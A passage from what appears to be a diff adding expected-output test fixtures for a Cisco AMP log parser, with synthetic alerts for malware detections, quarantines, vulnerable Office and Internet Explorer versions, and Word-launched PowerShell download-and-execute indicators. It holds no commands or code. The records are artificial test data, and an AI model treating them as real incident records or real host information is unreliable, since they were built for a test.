"cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411132837046517762", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 695000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 36288, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411132837046517761", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 691000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 37489, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:37:33.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2014-0260", + "CVE-2014-1761", + "CVE-2014-6357", + "CVE-2015-0085", + "CVE-2015-0086", + "CVE-2015-1641", + "CVE-2015-1650", + "CVE-2015-1682", + "CVE-2015-2379", + "CVE-2015-2380", + "CVE-2015-2424", + "CVE-2016-0127", + "CVE-2016-7193", + "CVE-2017-0292", + "CVE-2017-11826" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2014-0260", + "name": "Microsoft Office", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260", + "version": "2013" + }, + { + "cve": "CVE-2014-1761", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761" + }, + { + "cve": "CVE-2014-6357", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357" + }, + { + "cve": "CVE-2015-0085", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085" + }, + { + "cve": "CVE-2015-0086", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086" + }, + { + "cve": "CVE-2015-1641", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641" + }, + { + "cve": "CVE-2015-1650", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650" + }, + { + "cve": "CVE-2015-1682", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682" + }, + { + "cve": "CVE-2015-2379", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379" + }, + { + "cve": "CVE-2015-2380", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380" + }, + { + "cve": "CVE-2015-2424", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424" + }, + { + "cve": "CVE-2016-0127", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127" + }, + { + "cve": "CVE-2016-7193", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193" + }, + { + "cve": "CVE-2017-0292", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292" + }, + { + "cve": "CVE-2017-11826", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15152998206589, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2021-01-13T10:37:33.000Z", + "file.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", + "file.name": "WINWORD.EXE", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 41214, + "process.hash.sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef", + "related.hash": [ + "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:23:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 349000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6508159571352093000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 44193, + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:13:13.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 312509000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1515298360312529000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-13T10:13:13.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "PowerShell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 45111, + "process.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:13:08.000Z", + "cisco.amp.cloud_ioc.description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.", + "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 162019000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1515298355162029000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-13T10:13:08.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "PowerShell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 46862, + "process.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:00:07.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6508153524038139905", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 606000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508153524038140000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 48509, + "related.hash": [ + "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-12T10:24:47.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 693632000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521062325693667300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-12T10:24:47.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "input.type": "log", + "log.offset": 49613, + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-12T10:15:22.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 872000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6532910514396201000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "input.type": "log", + "log.offset": 51389, + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:49:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.GenericKD:Malwaregen.21do.1201", + "cisco.amp.detection_id": "6525520937264087041", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 661000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6525520937264087000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "cfdd16225e67471f5ef54cab9b3a5558", + "file.hash.sha1": "26de43cc558a4e0e60eddd4dc9321bcb5a0a181c", + "file.hash.sha256": "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9", + "file.name": "OLD.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 52332, + "process.hash.md5": "38ae1b3c38faef56fe4907922f0385ba", + "process.hash.sha1": "84123a3decdaa217e3588a1de59fe6cee1998004", + "process.hash.sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef", + "process.name": "explorer.exe", + "process.pid": 2632, + "related.hash": [ + "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9", + "cfdd16225e67471f5ef54cab9b3a5558", + "26de43cc558a4e0e60eddd4dc9321bcb5a0a181c" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:44.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.F2863A.211556.in02", + "cisco.amp.detection_id": "6525516191325224961", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 500000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6525516191325225000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "c624d61b8f076c3ef05f74eeb96c8954", + "file.hash.sha1": "7d9518ea3f98d037745352b23861fab05d3777dc", + "file.hash.sha256": "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117", + "file.name": "twhy.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 55057, + "process.hash.md5": "92f44e405db16ac55d97e3bfe3b132fa", + "process.hash.sha1": "04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d", + "process.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "process.name": "powershell.exe", + "process.pid": 4868, + "related.hash": [ + "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117", + "c624d61b8f076c3ef05f74eeb96c8954", + "7d9518ea3f98d037745352b23861fab05d3777dc" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:41.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 516130000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1519340132516139000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2020-12-25T05:30:41.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 57784, + "process.hash.sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:41.000Z", + "cisco.amp.cloud_ioc.description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.", + "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 474861000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1519340132474871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2020-12-25T05:30:41.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 59541, + "process.hash.sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:02:27.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2018-0762", + "CVE-2018-0772" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2018-0762", + "name": "Microsoft Internet Explorer", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762", + "version": "11" + }, + { + "cve": "CVE-2018-0772", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15193384389977, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2020-12-25T05:02:27.000Z", + "file.hash.sha256": "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0", + "file.name": "mshtml.dll", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 61194, + "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", + "related.hash": [ + "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:02:26.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2018-0762", + "CVE-2018-0772" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2018-0762", + "name": "Microsoft Internet Explorer", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762", + "version": "11" + }, + { + "cve": "CVE-2018-0772", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15193384371995, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2020-12-25T05:02:26.000Z", + "file.hash.sha256": "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4", + "file.name": "mshtml.dll", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 62768, + "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", + "related.hash": [ + "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:32:53.000Z", + "cisco.amp.computer.active": true, + 